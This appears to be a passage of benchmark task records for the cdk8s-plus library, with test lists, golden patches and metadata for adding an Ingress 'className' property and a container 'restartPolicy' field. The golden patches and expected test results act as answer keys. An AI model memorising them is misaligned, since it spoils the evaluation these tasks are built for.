"throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined" ]
Method: IngressProps.className (optional property) Location: src/ingress.ts – interface IngressProps extends base.ResourceProps Inputs: className?: string – the name of the IngressClass to associate with the Ingress. Outputs: N/A (the value is emitted as spec.ingressClassName in the synthesized Ingress manifest) Description: Adds an optional className field to IngressProps so callers can specify the ingressClassName of the resulting Kubernetes Ingress resource; when set, the manifest includes spec.ingressClassName with the provided string.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 9, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/2964", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding support for `ingressClassName` in IngressProps, which the test verifies by setting `className` and checking the synthesized manifest contains `ingressClassName`. The test directly reflects this requirement, and the needed code change is a straightforward property addition and mapping. No signals of B‑category problems are present. 
Therefore the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
f15b7eea1dc24969762326d4dd2bc0eeefc6de4a
2024-02-22 14:48:51
cdk8s-team__cdk8s-plus-3765
diff --git a/src/ingress.ts b/src/ingress.ts index 09bfceb7..983ddbbf 100644 --- a/src/ingress.ts +++ b/src/ingress.ts @@ -40,6 +40,14 @@ export interface IngressProps extends base.ResourceProps { * extension, if the ingress controller fulfilling the ingress supports SNI. */ readonly tls?: IngressTls[]; + + /** + * Class Name for this ingress. + * + * This field is a reference to an IngressClass resource that contains + * additional Ingress configuration, including the name of the Ingress controller. + */ + readonly className?: string; } /** @@ -90,6 +98,7 @@ export class Ingress extends base.Resource { metadata: props.metadata, spec: { defaultBackend: Lazy.any({ produce: () => this._defaultBackend?._toKube() }), + ingressClassName: props.className, rules: Lazy.any({ produce: () => this.synthRules() }), tls: Lazy.any({ produce: () => this.tlsConfig() }), },
fix(ingress): add `ingressClassName` to `IngressProps` (#2964) # Backport This will backport the following commits from `k8s-27/main` to `k8s-26/main`: - [fix(ingress): add `ingressClassName` to `IngressProps` (#2964)](https://github.com/cdk8s-team/cdk8s-plus/pull/2964) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add support for specifying an Ingress class name in Ingress constructs **Problem** Consumers could not declare which IngressClass a created Ingress should use, limiting control over the selected controller. The generated manifest therefore always omitted the `ingressClassName` field. **Root Cause** The Ingress construct’s property interface and underlying spec mapping lacked an `ingressClassName` attribute. **Fix / Expected Behavior** - Introduce an optional class name property on the Ingress configuration interface. - Propagate this property into the manifest’s `spec.ingressClassName` field when provided. - Preserve existing behavior when the property is omitted (no `ingressClassName` appears). - Update documentation to describe the new property and its purpose. **Risk & Validation** - Verify that existing manifests remain unchanged when the new property is not used. - Add tests to confirm that the `ingressClassName` field is correctly rendered when set. - Ensure TypeScript type compatibility for downstream projects.
3,765
cdk8s-team/cdk8s-plus
diff --git a/test/ingress.test.ts b/test/ingress.test.ts index 8f79dc36..65b63503 100644 --- a/test/ingress.test.ts +++ b/test/ingress.test.ts @@ -12,6 +12,36 @@ test('defaultChild', () => { }); +test('IngressClassName can be set', () => { + // GIVEN + const chart = Testing.chart(); + const service = new Service(chart, 'my-service', { ports: [{ port: 80 }] } ); + + // WHEN + new Ingress(chart, 'my-ingress', { + defaultBackend: IngressBackend.fromService(service), + className: 'myIngressClassName', + }); + + // THEN + expect(Testing.synth(chart).filter(x => x.kind === 'Ingress')).toStrictEqual([ + { + apiVersion: 'networking.k8s.io/v1', + kind: 'Ingress', + metadata: { name: 'test-my-ingress-c8135042' }, + spec: { + defaultBackend: { + service: { + name: 'test-my-service-c8493104', + port: { number: 80 }, + }, + }, + ingressClassName: 'myIngressClassName', + }, + }, + ]); +}); + describe('IngressBackend', () => { describe('fromService', () => { test('if the service exposes a port, it will be used by the ingress', () => {
[ "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host" ]
[ "can grant permissions on imported", "role can bind to imported", "defaultChild", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy 
namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "fromCommand", "fromHttpGet", "fromTcpSocket", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic 
synthesis", "default medium", "memory medium", "size limit", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "targets a deployment that has containers with volume mounts", "default configuration", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second 
periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when 
minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable 
service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "can select namespaces", "can select all namespaces", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports at instantiation", "cannot add an already existing port number", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is 
not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "Can mutate metadata", "custom configuration", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker 
auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from 
namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Ingress.constructor(scope: Construct, id: string, props: IngressProps) Location: src/ingress.ts Inputs: - **scope** – the parent construct (e.g., a Chart) in which the Ingress is defined. - **id** – logical identifier for the Ingress construct. - **props** – an `IngressProps` object; may include `defaultBackend` (IngressBackend) and the newly added optional `className?: string` that maps to the Kubernetes `spec.ingressClassName` field. Outputs: Creates a Kubernetes `Ingress` resource; when `props.className` is provided, the synthesized manifest contains `spec.ingressClassName` with that value. Description: Constructs an Ingress construct. The added `className` property enables callers (as exercised in the test) to set the `ingressClassName` field of the generated Ingress manifest. Interface: IngressProps Location: src/ingress.ts Inputs: - Existing fields (metadata, defaultBackend, rules, tls, …) - **className?: string** – optional name of an IngressClass to associate with this Ingress. Outputs: None (property contributes to the `Ingress` construct’s spec). Description: Extends the `IngressProps` interface with an optional `className` field; when supplied, the Ingress construct renders `spec.ingressClassName` in the resulting Kubernetes manifest.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 9, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.93, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/2964", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests adding support for the ingressClassName field to IngressProps, and the test asserts that a new `className` property results in the correct `ingressClassName` in the synthesized manifest. The test directly validates the required behavior and matches the expected implementation shown in the golden patch, with no extra hidden requirements. There are no signs of test coupling, implicit naming beyond the obvious mapping, external dependencies, ambiguous specs, unrelated patch artifacts, or domain‑specific knowledge beyond the repository. 
Therefore the task is cleanly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
42147712e37dcd4777bd9c76c780768906bb75c4
2024-03-01 07:36:09
serhatcetinkaya: @iliapolo thanks for the detailed check, I added all your suggestions. It should be ok now, can you give it another look please?
cdk8s-team__cdk8s-plus-3812
diff --git a/src/container.ts b/src/container.ts index 28048a6e..e5940b92 100644 --- a/src/container.ts +++ b/src/container.ts @@ -491,6 +491,27 @@ export interface ContainerLifecycle { } +/** + * RestartPolicy defines the restart behavior of individual containers in a pod. + * This field may only be set for init containers, and the only allowed value is "Always". + * For non-init containers or when this field is not specified, + * the restart behavior is defined by the Pod's restart policy and the container type. + * Setting the RestartPolicy as "Always" for the init container will have the following effect: + * this init container will be continually restarted on exit until all regular containers have terminated. + * Once all regular containers have completed, all init containers with restartPolicy "Always" will be shut down. + * This lifecycle differs from normal init containers and is often referred to as a "sidecar" container. + * + * @see https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/ + */ +export enum ContainerRestartPolicy { + + /** + * If an init container is created with its restartPolicy set to Always, + * it will start and remain running during the entire life of the Pod. + * For regular containers, this is ignored by Kubernetes. + */ + ALWAYS = 'Always' +} /** * Properties for creating a container. 
*/ @@ -658,6 +679,15 @@ export interface ContainerOpts { * group: 26000 */ readonly securityContext?: ContainerSecurityContextProps; + + /** + * Kubelet will start init containers with restartPolicy=Always in the order with other init containers, + * but instead of waiting for its completion, it will wait for the container startup completion + * Currently, only accepted value is Always + * @see https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/ + * @default - no restart policy is defined and the pod restart policy is applied + */ + readonly restartPolicy?: ContainerRestartPolicy; } /** @@ -713,6 +743,11 @@ export class Container { */ public readonly env: Env; + /** + * The restart policy of the container. + */ + public readonly restartPolicy?: ContainerRestartPolicy; + private readonly _command?: readonly string[]; private readonly _args?: readonly string[]; private readonly _ports: ContainerPort[] = []; @@ -759,6 +794,7 @@ export class Container { this.imagePullPolicy = props.imagePullPolicy ?? ImagePullPolicy.ALWAYS; this.securityContext = new ContainerSecurityContext(props.securityContext); this.env = new Env(props.envFrom ?? [], props.envVariables ?? {}); + this.restartPolicy = props.restartPolicy; if (this.portNumber) { this.addPort({ @@ -922,6 +958,7 @@ export class Container { preStop: this._lifecycle.preStop?._toKube(this), } : undefined, resources: resourceRequirements, + restartPolicy: this.restartPolicy, securityContext: this.securityContext._toKube(), }; } diff --git a/src/pod.ts b/src/pod.ts index db6ea332..c7f4ea6b 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -190,6 +190,10 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, const initContainers: k8s.Container[] = []; for (const cont of this.containers) { + // check if restartPolicy is defined for containers + if (cont.restartPolicy) { + throw new Error(`Invalid container spec: ${cont.name} has non-empty restartPolicy field. 
The field can only be specified for initContainers`); + } // automatically add volume from the container mount // to this pod so thats its available to the container. for (const mount of cont.mounts) {
feat(container): support `restartPolicy` field [KEP-753](https://github.com/kubernetes/enhancements/tree/e1a916745378660bafb96cb3c9f754fa793342f9/keps/sig-node/753-sidecar-containers) introduced native sidecar container support starting from kubernetes v1.28 This PR adds the field to Container object. Existing tests are working, I added one more test to make sure field is there if the property is specified
**Title** Add support for `restartPolicy` on init containers (sidecar semantics) **Problem** Customers need to declare a restart policy for init containers that act as sidecars, as introduced in KEP‑753. The library currently lacks this field, and there is no safeguard against setting it on regular containers. **Root Cause** The container model did not expose a restart‑policy attribute, and pod synthesis did not validate its appropriate usage. **Fix / Expected Behavior** - Introduce a `restartPolicy` option on the container construct, limited to the “Always” value. - Emit the `restartPolicy` field in the rendered pod spec for init containers only. - Validate during pod construction that only init containers may specify this field, throwing an error otherwise. - Add documentation and tests to confirm correct rendering and validation behavior. **Risk & Validation** - Verify that containers without the field continue to render unchanged. - Ensure the new validation triggers for illegal usage while allowing legitimate init‑container configurations. - Run the full test suite to confirm no regressions in existing functionality.
3,812
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/container.test.ts.snap b/test/__snapshots__/container.test.ts.snap index 5271e331..c94d5044 100644 --- a/test/__snapshots__/container.test.ts.snap +++ b/test/__snapshots__/container.test.ts.snap @@ -1,5 +1,79 @@ // Jest Snapshot v1, https://goo.gl/fbAQLP +exports[`Container "restartPolicy" property can be used to define restartPolicy 1`] = ` +Array [ + Object { + "apiVersion": "v1", + "kind": "Pod", + "metadata": Object { + "labels": Object { + "cdk8s.io/metadata.addr": "test-Pod-c815bc91", + }, + "name": "test-pod-c890e1b8", + }, + "spec": Object { + "automountServiceAccountToken": false, + "containers": Array [ + Object { + "image": "foo", + "imagePullPolicy": "Always", + "name": "main", + "resources": Object { + "limits": Object { + "cpu": "1500m", + "memory": "2048Mi", + }, + "requests": Object { + "cpu": "1000m", + "memory": "512Mi", + }, + }, + "securityContext": Object { + "allowPrivilegeEscalation": false, + "privileged": false, + "readOnlyRootFilesystem": true, + "runAsNonRoot": true, + }, + }, + ], + "dnsPolicy": "ClusterFirst", + "hostNetwork": false, + "initContainers": Array [ + Object { + "image": "bar", + "imagePullPolicy": "Always", + "name": "init-0", + "resources": Object { + "limits": Object { + "cpu": "1500m", + "memory": "2048Mi", + }, + "requests": Object { + "cpu": "1000m", + "memory": "512Mi", + }, + }, + "restartPolicy": "Always", + "securityContext": Object { + "allowPrivilegeEscalation": false, + "privileged": false, + "readOnlyRootFilesystem": true, + "runAsNonRoot": true, + }, + }, + ], + "restartPolicy": "Always", + "securityContext": Object { + "fsGroupChangePolicy": "Always", + "runAsNonRoot": true, + }, + "setHostnameAsFQDN": false, + "terminationGracePeriodSeconds": 30, + }, + }, +] +`; + exports[`Container "startupProbe" property has defaults if port is provided 1`] = ` Array [ Object { diff --git a/test/container.test.ts b/test/container.test.ts index eccb9ba7..4d570d58 100644 --- 
a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, ContainerRestartPolicy } from '../src'; describe('EnvValue', () => { @@ -536,6 +536,26 @@ describe('Container', () => { expect(container).not.toHaveProperty('startupProbe'); }); + test('"restartPolicy" property can be used to define restartPolicy', () => { + // GIVEN + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod'); + + // WHEN + pod.addContainer({ image: 'foo' }); + pod.addInitContainer({ + image: 'bar', + restartPolicy: ContainerRestartPolicy.ALWAYS, + }); + + // THEN + const manifest = Testing.synth(chart); + expect(manifest).toMatchSnapshot(); + const container = manifest[0].spec.initContainers[0]; + + expect(container.restartPolicy).toEqual('Always'); + }); + test('"readiness", "liveness", and "startup" can be used to define probes', () => { // GIVEN const container = new kplus.Container({ diff --git a/test/pod.test.ts b/test/pod.test.ts index 9378cb28..977e64da 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -1,7 +1,7 @@ import { Testing, ApiObject, Duration } from 'cdk8s'; import { Node } from 'constructs'; import * as kplus from '../src'; -import { DockerConfigSecret, FsGroupChangePolicy, Probe, k8s, RestartPolicy } from '../src'; +import { DockerConfigSecret, FsGroupChangePolicy, Probe, k8s, RestartPolicy, ContainerRestartPolicy } from '../src'; test('defaults', () => { @@ -1556,4 +1556,13 @@ test('custom termination grace period - minutes', () => { const manifest = Testing.synth(chart); const spec = manifest[0].spec; expect(spec.terminationGracePeriodSeconds).toEqual(120); -}); \ No newline at end of file +}); + +test('Containers should not specify "restartPolicy" field', () => { + const chart = 
Testing.chart(); + new kplus.Pod(chart, 'Pod', { + containers: [{ image: 'image', restartPolicy: ContainerRestartPolicy.ALWAYS }], + }); + expect(() => Testing.synth(chart)).toThrowError(); +}); +
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits 
